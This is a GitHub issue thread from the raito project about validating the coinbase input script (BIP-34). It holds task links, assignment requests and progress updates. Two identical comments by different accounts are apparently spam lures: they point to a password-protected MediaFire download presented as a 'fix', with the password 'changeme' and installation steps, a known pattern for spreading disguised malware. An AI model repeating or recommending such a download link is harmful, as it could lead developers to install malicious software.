### ISSUE TITLE
[feat] Validate coinbase input script (BIP-34)

### ISSUE THREAD

**Issue by m-kus** [keep-starknet-strange/raito#109]
Check its size bounds and ensure it starts with the current block height.

Read more:
- https://learnmeabitcoin.com/technical/mining/coinbase-transaction/
- https://github.com/bitcoin/bitcoin/blob/c6d2d1cb66b8c0c15b1a6a712e196869b4bf3040/src/consensus/tx_check.cpp#L47

**Comment by od-hunter** [comment]
Can I work on this please

**Comment by ShantelPeters** [comment]
Can I please be assigned to this issue?

**Comment by od-hunter** [comment]
Thank you ser!

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by m-kus** [comment]
How is the progress @od-hunter ? Do you need help with this task?

**Comment by maciejka** [comment]
@od-hunter what is the status of the issue? We would like to complete all open Milestone 2 issues this week. Do need need any help?

**Comment by od-hunter** [comment]
Sorry sir @maciejka , I’m on it already. I’ll push a pr soon please

**Comment by od-hunter** [comment]
@maciejka @m-kus How do I check for the amount of bytes the script sig contains since the script sig is a type `ByteArray`

**Comment by m-kus** [comment]
Resolved by #135
